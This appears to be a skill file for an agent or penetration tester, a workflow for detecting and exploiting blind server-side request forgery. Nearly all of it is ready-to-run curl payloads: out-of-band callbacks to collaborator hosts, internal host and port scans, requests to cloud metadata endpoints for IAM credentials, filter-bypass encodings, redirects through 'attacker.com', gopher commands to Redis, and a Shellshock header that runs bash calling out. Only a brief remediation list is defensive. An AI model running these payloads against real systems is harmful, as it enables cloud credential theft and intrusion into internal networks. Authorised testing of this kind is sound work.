---
name: performing-blind-ssrf-exploitation
description: Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions,
  and timing analysis to access internal services and cloud metadata endpoints.
domain: cybersecurity
subdomain: web-application-security
tags:
- blind-ssrf
- ssrf
- out-of-band
- burp-collaborator
- cloud-metadata
- internal-network
- oob-detection
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- PR.PS-01
- ID.RA-01
- PR.DS-10
- DE.CM-01
---

# Performing Blind SSRF Exploitation

## When to Use
- When testing URL/webhook input parameters where server-side responses are not reflected
- During assessment of applications that fetch external resources (avatars, previews, imports)
- When testing PDF generators, image processors, or document converters for SSRF
- During cloud security assessments to detect metadata endpoint access
- When evaluating webhook functionality and URL validation implementations

## Prerequisites
- Burp Suite Professional with Burp Collaborator for OOB detection
- interact.sh or webhook.site for external callback monitoring
- Understanding of SSRF attack vectors and internal network enumeration
- Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
- VPS or controlled server for advanced exploitation callback handling
- Python with requests library for automation scripts

## Workflow

### Step 1 — Identify Blind SSRF Input Points
```bash
# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=

# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
  -H "Content-Type: application/json" \
  -d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'

# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'

# Test image/avatar URL
curl -X POST http://target.com/api/profile/avatar \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'

# Test document import
curl -X POST http://target.com/api/import \
  -H "Content-Type: application/json" \
  -d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
```

### Step 2 — Confirm Blind SSRF with Out-of-Band Detection
```bash
# Use Burp Collaborator for DNS + HTTP callbacks
# Generate collaborator payload: xxxxxx.oastify.com

# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
# Check Collaborator for DNS lookups

# HTTP-based detection
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
# Check for HTTP requests in Collaborator

# interact.sh alternative
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://RANDOM.interact.sh"}'
# Monitor interact.sh dashboard for interactions
```

### Step 3 — Enumerate Internal Network
```bash
# Scan internal IP ranges via blind SSRF
# Use timing differences to determine if hosts are alive

# Scan common internal ranges
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
  start=$(date +%s%N)
  curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
  end=$(date +%s%N)
  elapsed=$(( (end - start) / 1000000 ))
  echo "$ip: ${elapsed}ms"
done

# Port scanning via blind SSRF
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
  curl -X POST http://target.com/api/fetch \
    -d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
  echo "Port $port tested"
done

# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
  -d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
```

### Step 4 — Access Cloud Metadata Endpoints
```bash
# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'

# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

# GCP metadata
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'

# Azure metadata
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'

# DNS rebinding for metadata access (bypass IP blocking)
# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
```

### Step 5 — Bypass SSRF Filters
```bash
# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}'       # Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}'         # Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}'         # Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}'              # Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}'              # IPv6

# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'

# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'

# DNS rebinding
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
```

### Step 6 — Escalate Blind SSRF to Data Exfiltration
```bash
# Exfiltrate data via DNS (when only DNS callback works)
# If you achieve SSRF to a service that reflects data:
# Chain: SSRF -> internal service -> DNS exfiltration

# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
  -d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'

# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"

# Exploit internal services via SSRF
# Redis: write SSH key
# Memcached: inject serialized objects
# Elasticsearch: read indices
# Internal API: access authenticated endpoints
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| Blind SSRF | Server makes request but response is not visible to attacker |
| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
| Time-Based Detection | Detecting SSRF success by measuring response time differences |
| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
| SSRFmap | Automated SSRF detection and exploitation framework |
| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
| webhook.site | Free webhook receiver for testing SSRF callbacks |
| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |

## Common Scenarios

1. **Cloud Credential Theft** — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
2. **Internal Service Discovery** — Use timing-based blind SSRF to enumerate internal network hosts and open ports
3. **Redis Exploitation** — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
4. **Webhook Abuse** — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
5. **PDF Generator SSRF** — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents

## Output Format

```
## Blind SSRF Assessment Report
- **Target**: http://target.com/api/fetch-url
- **Detection Method**: Burp Collaborator DNS + HTTP callback
- **Internal Access Confirmed**: Yes

### Findings
| # | Input Point | Payload | Detection | Impact |
|---|------------|---------|-----------|--------|
| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |

### Internal Network Map
| Host | Port | Service | Accessible |
|------|------|---------|-----------|
| 10.0.0.5 | 6379 | Redis | Yes |
| 10.0.0.10 | 9200 | Elasticsearch | Yes |
| 169.254.169.254 | 80 | AWS Metadata | Yes |

### Remediation
- Implement allowlist of permitted external domains for URL fetching
- Block requests to private IP ranges and cloud metadata endpoints
- Use IMDSv2 (token-required) for AWS instance metadata
- Disable unused URL schemes (gopher, file, dict)
- Implement network-level segmentation for application servers
```